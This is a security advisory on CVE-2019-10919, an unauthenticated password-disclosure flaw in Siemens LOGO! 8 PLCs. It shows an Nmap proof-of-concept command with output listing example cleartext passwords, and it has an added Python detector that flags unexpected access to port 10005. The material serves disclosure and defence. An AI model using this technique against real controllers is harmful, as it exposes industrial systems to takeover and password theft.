Siemens LOGO! 8 Missing Authentication

Type packetstorm
Reporter Matthias Deeg
Modified 2019-05-29T00:00:00


Advisory ID: SYSS-2019-013  
Product: LOGO!  
Manufacturer: Siemens  
Affected Version(s): LOGO! 8 (all versions)   
Tested Version(s): LOGO! 8, 6ED1052-2MD00-0BA8 FS:03, 0BA8.Standard V1.08.03  
Vulnerability Type: Missing Authentication for Critical Function (CWE-306)  
Risk Level: High  
Solution Status: Open  
Manufacturer Notification: 2019-04-04  
Solution Date: 2019-05-14 (recommended mitigation by manufacturer)  
Public Disclosure: 2019-05-29  
CVE Reference: CVE-2019-10919  
Authors of Advisory: Manuel Stotz (SySS GmbH), Matthias Deeg (SySS GmbH)  
Overview:
Siemens LOGO! is a programmable logic controller (PLC) for small
automation tasks.
The manufacturer describes the product as follows (see [1]):  
"Simple installation, minimum wiring, user-friendly programming: You can  
easily implement small automation projects with LOGO!, the intelligent  
logic module from Siemens. The LOGO! Logic Module saves space in the  
control cabinet, and lets you easily implement functions, such as  
time-delay switches, time relays, counters and auxiliary relays. "  
Due to storing passwords in a recoverable format on LOGO! 8 PLCs, an  
attacker can gain access to configured passwords as cleartext.  
Vulnerability Details:  
SySS GmbH found that the "GetProfile" function provided by a LOGO! 8
PLC, which is used for instance by the software tool LOGO! Soft Comfort,
does not require any authentication.
Thus, an attacker can send a "GetProfile" query to a LOGO! 8 PLC and  
will receive the requested profile information containing sensitive  
data such as different configured passwords.  
This profile data is encrypted - but it is encrypted via 3DES using a  
static, hard-coded cryptographic key, which is described in the SySS  
security advisory SYSS-2019-012 [2]. So, by knowing this 3DES key, an  
attacker can simply decrypt all sensitive data and use the contained  
cleartext passwords (see SySS security advisory SYSS-2019-014 [3]) in  
further attacks.  
Furthermore, SySS GmbH found that the function for setting
password data on a LOGO! 8 PLC can also be used without any
authentication. Therefore, an attacker can simply set arbitrary  
passwords by sending a specific request to the LOGO! 8 PLC via the  
Proof of Concept (PoC):  
SySS GmbH was able to extract sensitive data such as configured
passwords as cleartext from a LOGO! 8 using a self-developed Nmap script.
The following Nmap output shows an example of extracting cleartext
password data from a LOGO! 8 PLC:
$ nmap -p 10005 --script slig.nse  
Starting Nmap 7.70 ( ) at 2019-04-04 09:35 CEST  
Nmap scan report for  
Host is up (0.00044s latency).  
10005/tcp open stel  
| slig: Gathered Siemens LOGO!8 access details and passwords  
| User: LSCUser  
| Password: S3cret1  
| Enabled: True  
| User: AppUser  
| Password: S3cret2  
| Enabled: True  
| User: WebUser  
| Password: S3cret3  
| Enabled: True  
| User: TDUser  
| Password: S3cret4  
| Enabled: True  
| Protection: Password  
| Program password: SECRET  
|_MMC serial: \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00  
Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds  
A successful attack against a LOGO! 8 extracting all configured
passwords is demonstrated in our SySS PoC video [7].
Solution:
In the publicly released Siemens Security Advisory SSA-542701 [5],
the manufacturer Siemens recommends applying a defense-in-depth concept,
including the protection concept outlined in the system manual, as a
mitigation for reducing the risk of the described security issue.
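Because the affected functions require no authentication at all, the only control that actually stands between an attacker and the profile data is who can reach 10005/tcp on the PLC. The following script is an added example, not part of the SySS advisory or of any Siemens tooling: it scans constructed iptables-style firewall log lines and flags TCP connections to the LOGO! port on a known PLC that do not come from an allowlisted engineering workstation. The log format, the host addresses and the allowlist are assumptions for illustration and should be replaced with the firewall or NetFlow export actually in use.

```python
"""Detect access to the Siemens LOGO! 8 programming port (10005/tcp)
from hosts that are not approved engineering workstations.

Added example, not code from the advisory. The log format, addresses
and allowlist below are constructed for illustration.
"""
import re
from dataclasses import dataclass

LOGO_PORT = 10005  # the port probed by the advisory's Nmap script

# Constructed allowlist: hosts permitted to talk to the PLCs, e.g. the
# workstation running LOGO! Soft Comfort.
ALLOWED_SOURCES = {"10.0.1.10"}
# Constructed inventory of LOGO! 8 PLCs on the automation network.
PLC_HOSTS = {"10.0.2.20", "10.0.2.21"}

# Constructed, iptables-style firewall log lines (not real traffic).
SAMPLE_LOG = """\
Apr  4 09:35:01 fw kernel: FW-ACCEPT IN=eth1 OUT=eth2 SRC=10.0.1.10 DST=10.0.2.20 PROTO=TCP SPT=50122 DPT=10005 SYN
Apr  4 09:35:07 fw kernel: FW-ACCEPT IN=eth1 OUT=eth2 SRC=10.0.1.55 DST=10.0.2.20 PROTO=TCP SPT=41020 DPT=10005 SYN
Apr  4 09:35:09 fw kernel: FW-ACCEPT IN=eth1 OUT=eth2 SRC=10.0.1.55 DST=10.0.2.21 PROTO=TCP SPT=41021 DPT=80 SYN
Apr  4 09:35:12 fw kernel: FW-ACCEPT IN=eth1 OUT=eth2 SRC=10.0.3.7 DST=10.0.2.21 PROTO=UDP SPT=5353 DPT=10005
"""

# Pulls the 5-tuple fields out of one log line.
LINE_RE = re.compile(
    r"SRC=(?P<src>\d+\.\d+\.\d+\.\d+) DST=(?P<dst>\d+\.\d+\.\d+\.\d+) "
    r"PROTO=(?P<proto>\w+) SPT=(?P<spt>\d+) DPT=(?P<dpt>\d+)"
)


@dataclass(frozen=True)
class Alert:
    """A non-allowlisted host reached the LOGO! port on a PLC."""
    src: str
    dst: str


def parse_connections(log_text):
    """Yield (src, dst, proto, dport) for every line the regex matches."""
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m:
            yield m["src"], m["dst"], m["proto"].upper(), int(m["dpt"])


def find_unexpected_plc_access(log_text, allowed=ALLOWED_SOURCES, plcs=PLC_HOSTS):
    """Return one Alert per TCP/10005 connection to a PLC from a host
    outside the allowlist. Other ports and non-TCP traffic are ignored."""
    alerts = []
    for src, dst, proto, dport in parse_connections(log_text):
        if proto == "TCP" and dport == LOGO_PORT and dst in plcs and src not in allowed:
            alerts.append(Alert(src, dst))
    return alerts


if __name__ == "__main__":
    for alert in find_unexpected_plc_access(SAMPLE_LOG):
        print(f"ALERT: {alert.src} reached {LOGO_PORT}/tcp on PLC {alert.dst}")
```

On the constructed sample only the second line produces an alert: the first comes from the allowlisted workstation, the third targets port 80, and the fourth is UDP. The same rule is easy to express in a SIEM query; the value of running it is that, with no authentication on the PLC side, any such connection from an unexpected host should be treated as a probable disclosure of every configured password.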
Disclosure Timeline:  
2019-04-04: Vulnerability reported to manufacturer  
2019-04-04: Manufacturer confirms receipt of security advisory and  
asks for referenced Nmap script  
2019-04-04: SySS provides PoC Nmap script  
2019-05-14: Public release of Siemens Security Advisory SSA-542701  
2019-05-29: Public release of SySS security advisory  
References:
[1] Product website for Siemens LOGO!
[2] SySS Security Advisory SYSS-2019-012  
[3] SySS Security Advisory SYSS-2019-014  
[4] SySS Security Advisory SYSS-2019-013  
[5] Siemens Security Advisory SSA-542701  
[6] SySS Responsible Disclosure Policy  
[7] SySS Proof-of-Concept Video "Siemens LOGO! 8 PLC Password Hacking"  
Credits:
This security vulnerability was found by Manuel Stotz of SySS GmbH.
E-Mail: manuel.stotz (at)  
Public Key:  
Key fingerprint = F051 5B74 7E70 193E 7F66 0133 E790 F68A BCE6 8C6D  
Disclaimer:
The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
Creative Commons - Attribution (by) - Version 3.0